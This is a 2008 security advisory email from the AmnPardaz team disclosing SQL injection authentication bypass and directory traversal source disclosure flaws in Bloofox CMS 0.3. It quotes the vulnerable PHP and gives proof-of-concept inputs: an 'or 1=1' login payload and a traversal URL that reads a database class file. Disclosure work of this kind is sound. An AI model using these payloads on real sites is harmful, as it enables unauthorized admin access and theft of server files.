Bloofox CMS SQL Injection (Authentication bypass) , Source code
Date: Sun, 20 Jan 2008 09:43:47 +0330
From: [email protected]
To: [email protected]
Subject: Bloofox CMS SQL Injection (Authentication bypass) , Source code
disclosure
MIME-Version: 1.0
Content-Type: text/plain;
charset=ISO-8859-1;
DelSp="Yes";
format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Internet Messaging Program (IMP) H3 (4.1.2)
X-Virus-Scanned: antivirus-gw at tyumen.ru
########################## WwW.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title:Bloofox CMS Vulnerabilities
# Vendor: http://www.bloofox.com
# Bugs: SQL Injection (Authentication bypass) , Source code disclosure
# Vulnerable Version: 0.3 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix Available: No!
################################################################
####################
- Description:
####################
BloofoxCMS is a free open source content management system (CMS).
####################
- Vulnerability:
####################
+-->SQL Injection (authentication bypass)
Code Snippet:
index.php Line#107-116
if(isset($_POST['login']) || $_GET['login'] =3D=3D "true") {
=09if($perm->login($db,$_POST['username'],$_POST['password']) =3D=3D 1) {
=09=09$login_ok =3D 1;
=09=09if($_GET['login'] =3D=3D "true") {
=09=09=09load_url("index.php");
=09=09}
=09} else {
=09=09$login_failed =3D 1;
=09}
}
system/class_permissions.php Line#63-68
=09function login($db,$user,$pass)
=09{
=09=09global $tbl_prefix;
=09=09$pass =3D md5($pass);
=09=09$db->query("SELECT uid,username,password,groups FROM =20
".$tbl_prefix."sys_user WHERE username =3D '".$user."' && password =3D =20
'".$pass."' && blocked =3D '0' && deleted =3D '0' && status =3D '1' ORDER BY=
=20
username");
=09=09$total =3D $db->num_rows();
=09=09.
=09=09.
=09=09.
There is no input validation here therefore its possible for a remote =20
attacker to bypass login mechanism when magic quotes is disabled!
POC :
Username: admin' or 1=3D1 /*
Password: something
+--> Source code disclosure
Code Snippet:
file.php Line#25-49
$file =3D $_GET['file'];
// Block external linkings
$HTTP_REFERER =3D $_SERVER['HTTP_REFERER'];
if(strpos($HTTP_REFERER,$_SERVER['SERVER_NAME']) =3D=3D 0) {
=09die("Forget It!");
}
$basedir =3D getcwd()."/media/files";
// create file name
$filename =3D sprintf("%s/%s", $basedir, $file);
// check file on server
if(!file_exists($filename)) {
=09die("File not found!");
}
header("Content-Type: application/octet-stream");
$save_as_name =3D basename($file);
header("Content-Disposition: attachment; filename=3D\"".$save_as_name."\"");
// output
readfile($filename);
Input passed to the "file" parameter is not properly sanitised before =20
being used.
This can be exploited to display arbitrary files through directory =20
traversal attacks or by passing full paths.
POC:
GET: =20
http://servername/bloofoxCMS_0.3/file.php?file=3D../../system/class_mysql.ph=
p
Referer: http://servername/
####################
- Credit :
####################
Original advisory: http://bugreport.ir/?/27
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
